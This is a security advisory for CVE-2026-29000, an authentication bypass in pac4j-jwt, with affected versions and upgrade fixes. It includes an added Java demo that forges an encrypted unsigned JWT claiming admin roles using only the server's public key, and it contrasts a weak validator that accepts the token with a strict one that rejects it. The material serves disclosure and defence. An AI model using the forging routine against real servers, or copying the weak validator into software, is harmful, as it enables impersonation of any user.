Monday, 9 March 2026

pac4j-jwt Security Restriction Bypass Vulnerability

Release Date: 9 Mar 2026

RISK: Medium Risk

TYPE: Servers - Web Servers

A vulnerability has been identified in pac4j-jwt. A remote attacker who holds the server's RSA public key could exploit this vulnerability to bypass JWT signature verification and authenticate as an arbitrary user on the targeted system.


Note:

Proof-of-concept exploit code is publicly available for CVE-2026-29000. An attacker who possesses the server's RSA public key can build a JWE that wraps an unsigned PlainJWT carrying arbitrary subject and role claims; the encrypted token is accepted without signature verification, so the attacker can authenticate as any user, including administrators. Hence, the risk level is rated as Medium Risk.
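The following added example (not code from the advisory or from the pac4j project) reproduces the token shape described above with the Nimbus JOSE+JWT library (com.nimbusds:nimbus-jose-jwt, 9.x assumed) and contrasts two server-side validators: a weak one that trusts whatever JWT is found inside the decrypted JWE, and a strict one that requires the inner token to be a signed JWS and verifies it. The class name, the HS256 signing secret, the claim values and the use of RSA-OAEP-256/A256GCM are assumptions for the demo, not details taken from pac4j.

```java
import com.nimbusds.jose.EncryptionMethod;
import com.nimbusds.jose.JOSEException;
import com.nimbusds.jose.JWEAlgorithm;
import com.nimbusds.jose.JWEHeader;
import com.nimbusds.jose.JWEObject;
import com.nimbusds.jose.JWSAlgorithm;
import com.nimbusds.jose.JWSHeader;
import com.nimbusds.jose.Payload;
import com.nimbusds.jose.crypto.MACSigner;
import com.nimbusds.jose.crypto.MACVerifier;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jwt.JWT;
import com.nimbusds.jwt.JWTClaimsSet;
import com.nimbusds.jwt.JWTParser;
import com.nimbusds.jwt.PlainJWT;
import com.nimbusds.jwt.SignedJWT;

import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.text.ParseException;
import java.util.List;

public class NestedJwtBypassDemo {

    // Constructed demo secret for the inner HS256 signature (32+ bytes as MACSigner requires).
    // In a real deployment this never leaves the server; the attacker does NOT have it.
    private static final byte[] SIGNING_SECRET =
            "demo-hmac-secret-at-least-32-bytes-long!!".getBytes(StandardCharsets.UTF_8);

    private static JWEHeader nestedJweHeader() {
        // cty=JWT marks a nested JWT (RFC 7519 section 5.2)
        return new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                .contentType("JWT")
                .build();
    }

    /** Attacker side: encrypt an UNSIGNED PlainJWT using nothing but the server's public key. */
    static String forgeNestedPlainJwt(RSAPublicKey serverPublicKey) throws JOSEException {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")                          // arbitrary subject
                .claim("roles", List.of("ROLE_ADMIN"))     // arbitrary roles
                .build();
        PlainJWT unsigned = new PlainJWT(claims);          // alg=none, empty signature part
        JWEObject jwe = new JWEObject(nestedJweHeader(), new Payload(unsigned.serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    /** Legitimate issuer: sign first with the server secret, then encrypt (JWS nested in JWE). */
    static String issueSignedAndEncrypted(RSAPublicKey serverPublicKey) throws JOSEException {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("alice").claim("roles", List.of("ROLE_USER")).build();
        SignedJWT jws = new SignedJWT(new JWSHeader(JWSAlgorithm.HS256), claims);
        jws.sign(new MACSigner(SIGNING_SECRET));
        JWEObject jwe = new JWEObject(nestedJweHeader(), new Payload(jws));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    /** Weak validator: decrypts, then uses the inner claims whatever kind of JWT is inside. */
    static JWTClaimsSet weakValidate(String token, RSAPrivateKey serverPrivateKey)
            throws ParseException, JOSEException {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(serverPrivateKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());  // may be a PlainJWT
        return inner.getJWTClaimsSet();                              // no signature check at all
    }

    /** Strict validator: the decrypted payload must be a JWS, and that JWS must verify. */
    static JWTClaimsSet strictValidate(String token, RSAPrivateKey serverPrivateKey)
            throws ParseException, JOSEException {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(serverPrivateKey));
        SignedJWT inner = jwe.getPayload().toSignedJWT();           // null unless a JWS is inside
        if (inner == null) {
            throw new JOSEException("Rejected: decrypted payload is not a signed JWT");
        }
        if (!inner.verify(new MACVerifier(SIGNING_SECRET))) {
            throw new JOSEException("Rejected: inner JWS signature does not verify");
        }
        return inner.getJWTClaimsSet();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair kp = gen.generateKeyPair();
        RSAPublicKey pub = (RSAPublicKey) kp.getPublic();
        RSAPrivateKey priv = (RSAPrivateKey) kp.getPrivate();

        String forged = forgeNestedPlainJwt(pub);
        System.out.println("weak validator accepted forged subject: "
                + weakValidate(forged, priv).getSubject());
        try {
            strictValidate(forged, priv);
        } catch (JOSEException e) {
            System.out.println("strict validator: " + e.getMessage());
        }
        String legit = issueSignedAndEncrypted(pub);
        System.out.println("strict validator accepted legitimate subject: "
                + strictValidate(legit, priv).getSubject());
    }
}
```

The point of the contrast is that decryption proves nothing about who produced a token: anyone with the public key can encrypt, and a public key is by design not a secret (a JWKS endpoint or a bundled client configuration normally exposes it). Authenticity has to come from the inner signature, so a validator must assert the decrypted payload is a JWS and verify it before reading subject or role claims.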


Impact

  • Security Restriction Bypass

System / Technologies affected

  • pac4j-jwt 4.x versions prior to 4.5.9
  • pac4j-jwt 5.x versions prior to 5.7.9
  • pac4j-jwt 6.x versions prior to 6.3.3

Solutions

Before installation of the software, please visit the vendor website for more details.


Apply fixes issued by the vendor: upgrade to 4.5.9, 5.7.9 or 6.3.3 (or newer) for the 4.x, 5.x and 6.x lines respectively.


Vulnerability Identifier

  • CVE-2026-29000

Source


Related Link
